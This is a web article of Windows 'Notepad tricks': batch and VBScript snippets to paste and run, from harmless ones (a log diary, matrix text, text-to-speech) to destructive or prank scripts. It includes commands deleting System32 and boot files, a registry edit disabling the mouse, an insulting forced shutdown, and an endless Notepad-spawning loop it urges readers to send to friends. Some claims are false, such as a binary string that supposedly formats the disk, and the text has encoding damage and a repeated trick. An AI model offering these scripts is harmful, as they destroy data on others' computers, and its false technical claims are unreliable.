Windows notepad tricks – Windows is the best operating system at the lowest price. This operating system hides more tips and hacks inside, so in this article, I’ll explore aย hackย called “Notepad Hack“
Notepad is one of the simplerย Windowsย tools, it is mainly used for taking small notes, but now we are used to hacking and exploring hidden tricks.
List of windows notepad tricks
1. Make a personal log-Book
Now copy the below code and past it into the notepad and save it as “log.tex“
.LOG
Now every time you open this noteย file, You will have all the log details with data and time.
2. Test Antivirus Windows Notepad Tricks
By using this below code you can check your antivirus software
X5O!P%@AP[4PZX54(P^) 7CC)7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*
copy paste this code into your notepad and save it as “test.exe“. after that click saved “text.exe” file, this will check your antivirus software perfectly work or not, if not change your antivirus
3. Continually pop out CD Drive
This one of the best notepad trick to continually pop up the cd drive whenever you try to close it. Just copy paste the below code in your notepad and save it as “cd.vbs”ย
Set oWMP = CreateObject(โWMPlayer.OCX.7โณ)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count โ 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count โ 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
After save it, click the cd.vbs file you can see the cd drive pop up loop. if you need to close this loop you press “Ctrl + Alt +Delete“
4. Constantly Repeat Any Messages
This is one of the Best Notepad tricks that will repeat any of the messages on the computer screen repeatedly. Just copy the below code and paste in the notepad and save it as โmessage.batโ.
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
5. Keyboard hack type slowly
Once you execute this script it will slow down your typing speed onย windowsย screen. Just copy paste the below code on your notepad and save it with “anyname.vbs“
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject (โWScript.Shellโ)
WshShell.Run โnotepadโ
WScript.Sleep 100
WshShell.AppActivate Notepadโโ
WScript.Sleep 500
WshShell.SendKeys โHelโ
WScript.Sleep 500
WshShell.SendKeys โlo โ
WScript.Sleep 500
WshShell.SendKeys โ, hoโ
WScript.Sleep 500
WshShell.SendKeys โw aโ
WScript.Sleep 500
WshShell.SendKeys โre โ
WScript.Sleep 500
WshShell.SendKeys โyouโ
WScript.Sleep 500
WshShell.SendKeys โ? โ
WScript.Sleep 500
WshShell.SendKeys โI aโ
WScript.Sleep 500
WshShell.SendKeys โm gโ
WScript.Sleep 500
WshShell.SendKeys โoodโ
WScript.Sleep 500
WshShell.SendKeys โ thโ
WScript.Sleep 500
WshShell.SendKeys โankโ
WScript.Sleep 500
WshShell.SendKeys โs! โ
6. Shutdown message Windows Notepad Tricks
Just copy the below code and paste in the notepad and save its as โname.batโ.
@echo off
msg * Hey how are you
shutdown -c โError! You are really a stupid!โ -s
7. Format Hard disk
This is very dangerous because, if you execute this script on your windows, your hard disk data formatted completely. So do it with your own risk.
Copy paste the below code into your notepad and save it with “Name.exe“
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
8. Matrix effect Windows Notepad Tricks
The below code will give you a matrix effect on your screen. so type the below code in your notepad and save it as “matrix.bat“
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
9. Convert Text Into Audio
This is a very cool notepadย trickย and this code will convert your text into an audio file. Just copy the below code and paste it into notepad and save it as โtext-to-audio.vbsโ
Dim message, sapi message=InputBox(โEnter your text for conversionโTech-viralโ,โHover pc Hacks Text-To-Audio Converterโ) Set sapi=CreateObject(โsapi.spvoiceโ) sapi.Speak message
10. LED Dance of Keyboard
Simply open Notepad and enter the following code and save the file as โLEDDance.vbsโ. Once you open the saved file, you will see all three LED lights of a keyboard will start to blink repeatedly.
Set wshShell =wscript.CreateObject(โWScript.Shellโ)
do
wscript.sleep 100
wshshell.sendkeys โ{CAPSLOCK}โ
wshshell.sendkeys โ{NUMLOCK}โ
wshshell.sendkeys โ{SCROLLLOCK}โ
loop
11. Open Notepad continuously
You just copy paste this below code into your notepad and save it with “note.bat” name. now send this file into your friends, if your friend click the file, the notepad open continuously.
@ECHO OFF
:TOP
START %SYSTEMROOT%\SYSTEM32\NOTEPAD.EXE
GOTO TOP
12. Disable mouse control
Well, you should never try this on your computer, because this method disables the mouse controls on your computer.
rem Disable Mouse
set key=โHKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclassโ
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
13. Hit enter continuously
This trick will let you use the function of the enter button to happen again and again. Well, you just need to copy and paste the following code into the notepad and save it with “note.bat“
Set wshShell = wscript.CreateObject(โWScript.Shellโ)
do
wscript.sleep 100
wshshell.sendkeys โ~(enter)โ
loop
14. Deleting startup files in Windows Notepad Tricks
Well, Don’t try this method on your computer unless you are willing to lose all your data. This code will remove your computer startup files so use with your own risk.
Copy and paste the below code into your notepad and save it with “any-name.bat” name.
@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI
15. Hit backspace continuously
Well, this is funniest one you can do with no fear. Once you execute the below code on your computer the backspace button will work on continuously.
Just copy and past the below code into your notepad and save it as “any-name.vbs” name
MsgBox โBackspace again and again and AGAINโ
Set wshShell =wscript.CreateObject(โWScript.Shellโ)
do
wscript.sleep 100
wshshell.sendkeys โ{bs}โ
loop
16. Deleting system32 Files
Well, this is another notepadย trickย to devastate a PC. This notepadย trickย will delete System32 files leading to system failure. Itโs not advisable to implement the trick, but this code has the power to shut down any working computer within minutes.
Make sure to save the notepad file as .bat file format.
DEL C:\WINDOWS\SYSTEM32\*.*/Q
17. Force windows to shut down
This is another notepad trick that will forcefully shut down your computer. You just need to enter the given code into the notepad and save it as .bat format. Hereโs the code.
Make sure to save the notepad in .bat format
@echo off
shutdown computer
-c โsleep tightโ -s
18. Erase Texts Automatically
Want to annoy your friends by increasing the type anyway? Then thereโs an easy way to do this by typing a simple line of code into your Notepad file. Ask your friends to type anything in the Notepad interface that opens after opening this .vbs file and nurtures the look of their face buffet.
MsgBox โBackspace again and again and AGAINโ
Set wshShell =wscript.CreateObject(โWScript.Shellโ)
do
wscript.sleep 100
wshshell.sendkeys โ{bs}โ
loop